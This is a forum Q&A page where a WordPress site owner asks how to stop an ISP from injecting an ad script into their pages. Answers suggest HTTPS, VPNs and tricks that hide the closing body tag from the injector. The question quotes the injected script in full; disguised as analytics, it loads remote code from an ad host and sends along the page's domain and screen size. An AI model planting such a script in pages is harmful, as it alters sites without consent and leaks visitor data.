CODEWITHSUNDEEP
securitycode-injectionads
user4804299
user4804299

Reputation:

How to clean up ads injection on wordpress which injected through ISP

My website gets injected by a script like this:

    <script>function netbro_cache_analytics(fn, callback) {setTimeout(function() 
{fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var 
idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r 
= Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-
ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + 
"4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRZ3f35Ig3RToKRLvWLwn6zEfnHRgrVr0WVf09gsyzoppB6HQ
lZs1%2bvVlaBJErvk4yTApvNxVRroJE3Sak6whXVhS8NtL5WQQ7xqk%2fl%2beEqRKsRzR0FuA%2bMRbKp
Tz%2fh8pwQUsZzPSHlUJaQ5eWnpe41LMxALmGAJ7wR93fB809%2b3BMdyLrPSeRjoat5eXfxM8hB8cF8FA
%2fADZ9XefsIT5mcIatvUYk00Cx89VQVB9oihM6lthSHZK76HYE2yVlBaqYl8N8lJpYpl3bTDK3nTOnpcZ
H07XEZDdhweI6oHkutA8rENrMv64HLRLfn%2fIH2yN7Q3C4Ly7sE6g9%2fkyUxZo0IvZ4NsUcBJwZ10Joo
9f63JGGYp%2bn8ZXG%2bI%2bHpuDri0qeXDPamxLkuhbs1gXAgx6ZSwZXm4940rBN97J6uiaXdZCyDo4ms
n2R%2f7i6CjiMCM66JMRM0RtI%2b4dRfZ2L78M%2bMB5T63xl0aYzBPpcoJFnNp75TozLX0wVNH7ZQLMIm
mchINjLEKPqXmlxC6kjQXWZiXrRa0nXtRY%2bUvCvz6huwCvSs3W8GNolSQ%3d%3d" + 
"&idc_r="+idc_glo_r + "&domain="+document.domain + 
"&sw="+screen.width+"&sh="+screen.height;var bsa = 
document.createElement('script');bsa.type = 'text/javascript';bsa.async = 
true;bsa.src = url;(document.getElementsByTagName('head')
[0]||document.getElementsByTagName('body')
[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){ });</script>
</body>
    </html>

u-ad.info belongs to the company who manages my ISP (TELKOM). I have complained with them but it will never solve the problem. I'm using WordPress. How do I clean that script or block that script injection?

Upvotes: 4

Views: 4375

Answers (8)

Rere
Rere

Reputation: 11

Updated: Telkom ISP already detected if </body></html> inside a comment.
My solution:

no </body></html> at all
Let the browser close the tag it self

Already tested and it worked as December 2018

Thank you

Upvotes: 1

IcecoldCore
IcecoldCore

Reputation: 11

There is a very simple method to prevent script injecting works.

Just add this script right before </body> tags.

<script>
//</body>
</script>

This image show before and after using.

Before use:

Before use

After use:

After use

If you use wordpress, just make sure you installed plugin to allow you write that script in your footer section.

Just do this before ISP TELKOM know.

Upvotes: 1

bimosaurus
bimosaurus

Reputation: 1

Use HTTPS (if provided by server), or using VPN/SSH Tunneling/Secure Proxy. So all problems will be clean. The ISP injected the ads and analytic scripts, by extract all compression, injecting and not compress-back the data. It will make additional charge for your internet connection quota.

Upvotes: 0

th30nly
th30nly

Reputation: 1

Insert code below in head or end of HTML.

<script type="text/javascript">
    $(document).ready(function(){
        $('body').append("</bo"+"dy>");
    });
</script>

But make sure that your HTML code doesn't contain </body> end tag and includes jQuery in your <head> tag.

Example:

Full HTML

<html>
    <title>Foo bar</title>
    <head></head>
    <body>Lorem Ipsum</body>
</html>

becoming

<html>
    <title>Foo bar</title>
    <head>
        <script src=”https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js”></script>
    </head>
    <body>Lorem Ipsum
        <script type="text/javascript">
        $(document).ready(function(){
            $('body').append("</bo"+"dy>");
            });
        </script>
</html>

without </body> end tag. The HTTP filter on ISP will grep the </body> or </Body> or whatever <body> closing tag then inject JavaScript code before <body> closing tag so that their ads will appear on any website that uses the HTTP protocol.

Upvotes: -1

user4913965
user4913965

Reputation:

based on my experience, you can use https protocol or use this tricks to avoid load script from your ISP :P

<!-- </body></html> -->

Add code above, above your 'real' </body></html> tag, let's do it!

Upvotes: 0

Firdaus
Firdaus

Reputation: 43

See my solution at http://www.kaskus.co.id/thread/5491671f0e8b46ff29000007/mengakali-script-injeksi-spidol-as-a-web-developer just change 

</body>

to 

</Body>

Upvotes: 1

shanihp
shanihp

Reputation: 51

Change the body tag to uppercase.

My experiment shows that the script injector look specifically for the presence of body tag written in lower case. Although, I'm not sure how long it will stay that way though.

Upvotes: 1

ihsan
ihsan

Reputation: 2289

Bad ISP! :D

You cannot clean that script because it is injected when it pass through your ISP server. You can only block it on browser level. Read this https://askubuntu.com/q/64303/224951. It's a pity that all your website visitor who use the same ISP will get the same injected page.

I think Google won't blacklist your site because certainly it is not using your ISP thus don't see the injected script.

Upvotes: 3

Related Questions